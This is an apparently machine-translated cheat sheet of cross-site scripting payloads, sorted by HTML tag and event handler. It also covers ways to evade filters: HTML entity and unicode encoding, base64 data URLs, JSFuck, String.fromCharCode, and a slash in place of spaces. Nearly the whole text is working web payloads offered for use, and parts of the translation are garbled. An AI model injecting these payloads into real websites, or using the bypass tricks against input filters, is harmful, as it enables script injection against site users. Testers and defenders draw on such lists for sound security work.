xxs
1. js tag may be performed, through testing firefox, where js code used can be divided into external and internal, external <script src = http: //xxx.js> </ script>, can be divided into direct internal calls <script > coding </ script>, attributes, pseudo-protocol, as follows:
<script> eg:<script>alert(1)</script>
<a> eg <a href=javascript:alert(1)>11</a>
<p> eg <p onclick='javascript:alert(1)'>11</p>
<img> eg <img src=1 onerror=alert(1)>
<body> eg <body onload=alert(1)></body>
<button> eg<button onclick=alert(1)>sure</button>
<Var> eg <var onclick = alert (1)> sure </ var> displayed in italics
<div>eg <div onclick=alert(1)>sure</div>
<iframe> eg <iframe onload=alert(1)>sure</iframe>
<object> eg<object onclick=alert(1)>sure</object>
<input> eg<input onclick=alert(1)>
<select>eg <select onclick=alert(1)></select>
<Texttarea> eg <texttarea onclick = alert (1)> 11, </ texttarea>
<keygen> eg <keygen onclick=alert(1)>
<frameset> eg<frameset onload=alert(1)>11</frameset>
<embed>
<svg> eg<svg/onload=alert(1)>
<math>
<video>
<audio>
2. All events
onload onunload (or out of the page when f5) onchange onsubmit onreset (reset) onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondbclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop
3. You can perform attribute of js
formaction action href xlink:href autofocus src content data
<input type="submit" formaction="demo-admin.php" value="提交">
<form action="javascript:alert(1)">code</form>
<a href='javascript:alert(1)'>11</a>
4. Custom tags
<M/onclick="alert(1)">11</M>
By / 5 instead of spaces between the tags and attributes
<img/src=x onerror=alert(1)>
6. a label
6.1 using the pseudo protocol: <a href=javascript:alert(2)> M
6.2 data url:<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>M
Note two things:
The first point encryption and decryption website: https: //tool.oschina.net/encrypt type = 3, base64 encryption and decryption,?
Second, the format data: mime type; Base64, content
6.3urlencode: (firefox and chrome invalid)
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M
http://www.jsons.cn/urlencode/ urlencode coding online
6.4 binary coding
Binary encoding used to js8 decimal, hexadecimal JS16, url encoding, Base64 encoding, html entities, html10 band, html16 band, with particular reference https://www.bihuoedu.com/vul/radix/radix16.php , page also contains a lot of simple vulnerability testing
<a href=javascript:alert(13)> M can pop.
& # X61 and & # x61; html hex code number indicating a. # 97 url encoding, represents a. & # X3A; html16 hex:
<a href=javascript:confirm(2)> M. & Colon; represents: So if the filtering: to bypass the above may be used in several ways. If the filter alert () can confirm
<svg><a xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a></svg>
xlink: href attribute, White link content, and the custom height and width
<math><a xlink:href=javascript:alert(1)>M
math label
7script label
7.1. Routine testing using <script> alert (1) </ script>
7.2 filter alert () to alert (1) encoding, http:. //Www.jsfuck.com/ may be generated.
3. <script firefox> alert (1) </ script> can pop, and must be a standardized script
4. encoding or
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script>
The coding
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script>
6. not only alert () pop
<script>prompt(-[])</script>
<script>confirm(-[])</script>
7. Instead of double and single quotes
<script>alert(/3/)</script>
Such may be <script> alert ( '3') </ script> and <script> alert (3) </ script> may pop
8. The digital conversion string
<script>alert(String.fromCharCode(49))</script>
9. Add .source
<script>alert(/7/.source)</script>
10. Use setTimeout
<script>setTimeout('alert(1)',0)</script>
button label
1. Event
<button/onclick=alert(1) >M</button>
2. rarely used formaction property
<form><button formaction=javascript:alert(1)>M
3. Auto Focus
<button onfocus=alert(1) autofocus>
p tag
1. Output outside label statement directly js
2. The output attribute, consider closing tags and quotes
<p/onmouseover=javascript:alert(1); >M</p>
img tag
<img src=x onerror=alert(1)>
<Img src? Itworksonchrome? \ / Onerror = alert (1)> filtered src = valid only be used in chrome @
<Img src = x onerror = window.open ( 'http://www.baidu.com');> automatically opens a window, the browser will automatically block, if the user chooses to allow, will open
<Img / src / onerror = alert (1)> chrome filtered spaces, can use this
<img src="x:kcf" onerror="alert(1)">
body tag
<body onload=alert(1)>
Var [label]
<var onmouseover="prompt(1)">KCF</var>
[Div tag]
<div/onmouseover='alert(1)'>X
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onclick="alert(52)">
iframe
<IFRAME SRC = "javascript: alert (1);"> </ IFRAME> pseudo-protocol
<iframe/onload=alert(53)></iframe> 属性
meta tags
Provides a new way for mining xss, some sites title will display personal information of member name, client control, to sum up xss output position, 1. the current page, the page source code and the dom page 3. 2. Other documents 4 . Web site name
object labels
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
marquee tag
<marquee onstart="alert('sometext')"></marquee>
isindex label
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
[Label] input
Nothing special, to call js by event. And examples of previous button to achieve the same without interaction by the autofocus can pop effect. Here to use onblur hope that we learn by analogy.
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
[Select] label
<select onfocus=javascript:alert(1) autofocus>
[Textarea tag]
<textarea onfocus=javascript:alert(1) autofocus>
[Label] keygen
<keygen onfocus=javascript:alert(1) autofocus>
[Label] frameset
<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
<frameset onload=alert(1)>
[Embed tag]
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></embed> //chrome
<embed src=javascript:alert(1)> //firefox
[Label] svg
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg> //chrome有效
[Math label]
<math href="javascript:javascript:alert(1)">CLICKME</math>
<math><y/xlink:href=javascript:alert(51)>test1
<math> <maction actiontype="statusline#http://wangnima.com"
xlink:href="javascript:alert(49)">CLICKME</maction> </math>
[Video] tag
<video><source onerror="alert(1)">
<video src=x onerror=alert(48)>
[Audio] label
<audio src=x onerror=alert(47)>
Reference Links: https://www.leavesongs.com/PENETRATION/xss-collect.html